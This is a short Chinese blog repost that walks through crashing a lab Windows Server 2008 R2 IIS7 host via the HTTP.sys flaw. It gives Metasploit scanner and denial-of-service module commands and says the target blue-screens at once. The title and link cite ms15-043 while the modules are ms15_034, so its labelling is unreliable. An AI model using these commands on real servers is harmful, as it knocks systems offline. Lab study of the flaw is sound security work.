其他分享
首页 > 其他分享> > http.sys_DDos攻击(ms15-043)

http.sys_DDos攻击(ms15-043)

作者:互联网

远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致该漏洞。该漏洞利用成功可使目标机器蓝屏。 微软官方说明: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-043?redirectedfrom=MSDN   1、环境搭建 使用的是Windows server 2008 R2 x64里面自带的II7。   2、漏洞验证 该scanner与exp早已在msf中集成 加载漏洞验证模块   use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 192.168.112.130   3、漏洞利用 加载漏洞利用模块 use auxiliary/dos/http/ms15_034_ulonglongadd 被攻击主机瞬间蓝屏。                

标签:http,sys,漏洞,DDos,ms15,HTTP,蓝屏
来源: https://www.cnblogs.com/Smoke-star/p/11698712.html